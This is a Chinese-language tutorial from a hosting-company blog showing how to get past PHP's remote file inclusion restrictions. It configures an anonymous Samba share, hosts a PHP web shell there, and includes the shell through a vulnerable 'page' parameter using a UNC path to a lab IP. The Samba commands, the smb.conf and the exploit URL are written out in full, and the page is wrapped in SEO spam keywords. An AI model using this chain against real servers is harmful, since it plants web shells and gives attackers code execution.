中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何利用SMB共享來繞過php遠程文件包含的限制

發布時間:2021-10-11 16:43:06 來源:億速云 閱讀:128 作者:柒染 欄目:網絡管理

這篇文章將為大家詳細講解有關如何利用SMB共享來繞過php遠程文件包含的限制,文章內容質量較高,因此小編分享給大家做個參考,希望大家閱讀完這篇文章后對相關知識有一定的了解。

PHP 和 SMB 共享文件訪問

在PHP配置文件中,“allow_url_include”wrapper默認設置為“Off”,指示PHP不加載遠程HTTP或FTP URL,從而防止遠程文件包含攻擊。但是,即使“allow_url_include”和“allow_url_fopen”都設置為“Off”,PHP也不會阻止加載SMB URL。而這就極有可能被濫用來從SMB共享加載遠程托管的PHP Web shell。

攻擊場景概述

當易受攻擊的PHP應用程序代碼嘗試從受攻擊者控制的SMB共享加載PHP Web shell時,SMB共享應允許訪問該文件。攻擊者需要在其上配置具有匿名瀏覽訪問權限的SMB服務器。因此,一旦易受攻擊的應用程序嘗試從SMB共享訪問PHP Web shell,SMB服務器將不會要求任何的憑據,易受攻擊的應用程序將包含Web shell的PHP代碼。

首先,我重新配置了PHP環境,并在php.in i文件中禁用了“allow-url-fopen”和“allow-url-include”。之后,配置了具有匿名瀏覽訪問的SMB服務器。一旦SMB共享準備就緒,我們就可以利用易受攻擊的應用程序了。

PHP 環境設置

將托管易受攻擊代碼的機器上的“allow_url_fopen”和“allow_url_include”設置為“Off”

以下是版本為“5.5.11”的PHP當前配置截圖:

如何利用SMB共享來繞過php遠程文件包含的限制

在繼續下一步之前,讓我們確保當我們嘗試訪問HTTP上托管的Web shell時,PHP代碼不允許遠程文件包含。

如何利用SMB共享來繞過php遠程文件包含的限制

可以看到,當我試圖從遠程主機包含PHP Web shell時,應用程序拋出錯誤并且沒有包含遠程文件。

使用匿名瀏覽訪問配置 Samba 服務器(Linux 機器)

使用以下命令安裝Samba服務器:

apt-get install samba

創建SMB共享目錄:

mkdir /var/www/html/pub/

如何利用SMB共享來繞過php遠程文件包含的限制

配置新創建的SMB共享目錄的權限:

chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/

如何利用SMB共享來繞過php遠程文件包含的限制

運行以下命令,刪除SAMBA服務器配置文件的默認內容。

echo > /etc/samba/smb.conf

將以下內容添加到/etc/samba/smb.conf文件。

[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes

[ica]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody

現在,重啟SAMBA服務器以使配置文件/etc/samba/smb.conf中的新配置生效。

service smbd restart

成功重啟SAMBA服務器后,嘗試訪問SMB共享并確保SAMBA服務器不要求提供憑據。

在本例中,SAMBA服務器IP為192.168.0.3,我需要訪問Windows文件瀏覽器中的SMB共享,如下:

\\192.168.0.3\

如何利用SMB共享來繞過php遠程文件包含的限制

在 SMB 共享中托管 PHP Web shell

太棒了!可以訪問smb共享,并顯示目錄“ica”存在。

現在,將PHP shell托管在目錄“/var/www/html/pub”中,該目錄為smb共享目錄“ica”。

如何利用SMB共享來繞過php遠程文件包含的限制

成功托管PHP shell后,我們使用Windows文件瀏覽器訪問SMB共享目錄“ica”。

\\192.168.0.3\ica\

可以看到php shell存在于smb共享目錄中,在本例中為box.php文件。

如何利用SMB共享來繞過php遠程文件包含的限制

利用文件包含易受攻擊的參數

讓我們使用這個PHP shell SMB鏈接,以及易受攻擊的php代碼瀏覽它。

http://vulnerable_application/page.php?page=\\192.168.0.3\ica\box.php

PHP易受攻擊的代碼從SMB共享中獲取了web shell,并在應用程序服務器上執行了代碼\m/。我們已經繞過了php遠程文件包含的限制,并包含了托管在遠程主機上的Web shell。

如何利用SMB共享來繞過php遠程文件包含的限制

 

關于如何利用SMB共享來繞過php遠程文件包含的限制就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

昭通市| 额济纳旗| 云浮市| 巧家县| 吉木乃县| 璧山县| 红安县| 阿荣旗| 六枝特区| 南木林县| 平南县| 丰台区| 南开区| 临沭县| 阳曲县| 正阳县| 壤塘县| 衡东县| 砚山县| 东城区| 北票市| 宝应县| 兖州市| 北流市| 新河县| 营山县| 策勒县| 武鸣县| 永福县| 威信县| 义马市| 达州市| 黑山县| 达尔| 郁南县| 松阳县| 阿拉善右旗| 佛坪县| 北碚区| 库尔勒市| 昆明市|